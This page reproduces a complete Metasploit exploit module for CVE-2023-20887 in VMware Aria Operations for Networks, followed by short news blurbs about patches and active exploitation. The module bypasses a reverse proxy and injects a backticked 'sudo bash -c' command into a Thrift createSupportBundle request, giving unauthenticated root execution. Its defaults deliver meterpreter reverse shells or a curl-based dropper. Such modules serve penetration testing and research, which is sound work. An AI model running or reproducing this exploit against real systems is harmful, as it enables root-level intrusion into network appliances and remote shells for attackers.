Headline
VMWare Aria Operations For Networks Remote Command Execution
VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of root on the appliance. VMWare 6.x version are vulnerable. This Metasploit module exploits the vulnerability to upload and execute payloads gaining root privileges. Successfully tested against version 6.8.0.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE', 'Description' => %q{ VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. This module exploits the vulnerability to upload and execute payloads gaining root privileges. Successfully tested against version 6.8.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'Sina Kheirkhah', # Metasploit Module, PoC. (@SinSinology) of Summoning Team (@SummoningTeam) on twitter 'Anonymous with Trend Micro Zero Day Initiative', 'h00die' # msf module updates, corrections, qol ], 'References' => [ ['CVE', '2023-20887'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'], ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'], ['URL', 'https://github.com/sinsinology/CVE-2023-20887'] ], 'DisclosureDate' => '2023-06-07', 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Type' => :in_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'printf' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'Payload' => { 'BadChars' => "\x27" }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def check_vrni res = nil (2..10).step do |x| res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.#{x}.0/locales/en-GB/components/UI"), 'vars_get' => { 'pseudo' => 'false' } }) next if res && res.code == 200 && res.body.include?('Failed to get locale list for vRNIUI') break end res end def execute_command(cmd, _opts = {}) print_status('Attempting to execute shell') shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{rand(1000..9999)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(4)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(4)}\",\"#{Rex::Text.rand_text_alpha(4)}\"]}}]" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/saas./resttosaasservlet'), 'ctype' => 'application/x-thrift', 'headers' => { 'Accept' => 'application/json, text/plain, */*' }, 'encode_params' => false, 'data' => shell }) fail_with(Failure::Unknown, 'Communication error occurred') if res.nil? end # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight) def check print_status("Checking if #{peer} can be exploited.") res = check_vrni return CheckCode::Unknown('No response received from the target!') unless res body = res.get_json_document if body.nil? || body['data']['productName'] != 'vRNIUI' return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).') end version = Rex::Version.new(body['data']['version']) return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} was found.") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10') CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{version}") end def exploit case target['Type'] when :in_memory print_status("Executing #{target.name} with #{payload.encoded}") execute_command(payload.encoded) when :linux_dropper print_status("Executing #{target.name}") execute_cmdstager end endend
Related news
VMware has released software updates to correct two security vulnerabilities in Aria Operations for Networks that could be potentially exploited to bypass authentication and gain remote code execution. The most severe of the flaws is CVE-2023-34039 (CVSS score: 9.8), which relates to a case of authentication bypass arising as a result of a lack of unique cryptographic key generation. "A
Discover stories about threat actors’ latest tactics, techniques, and procedures from Cybersixgill’s threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel
Categories: News Tags: CISA Tags: BOD 23-02 Tags: Internet exposed Tags: management interfaces Tags: vulnerabilities Tags: CVE-2023-27992 Tags: CVE-2023-20887 There is a lot to be said for the strategy of shielding management interfaces from public internet access (Read more...) The post Reducing your attack surface is more effective than playing patch-a-mole appeared first on Malwarebytes Labs.
VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887, could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware
The Chinese state-sponsored group known as UNC3886 has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as CVE-2023-20867 (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials
Categories: Exploits and vulnerabilities Categories: News Tags: cve-2023-20887 Tags: cve-2023-20888 Tags: cve-2023-20889 Tags: vmware Tags: Aria Operations for Networks Tags: RCE Tags: information disclosure Tags: deserialization Tags: command injection VMware has released security updates to fix a trio of flaws in Aria Operations for Networks that could result in information disclosure and remote code execution (Read more...) The post VMware patches critical vulnerabilities in Aria Operations for Networks appeared first on Malwarebytes Labs.
VMware has released security updates to fix a trio of flaws in Aria Operations for Networks that could result in information disclosure and remote code execution. The most critical of the three vulnerabilities is a command injection vulnerability tracked as CVE-2023-20887 (CVSS score: 9.8) that could allow a malicious actor with network access to achieve remote code execution. Also patched by
Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.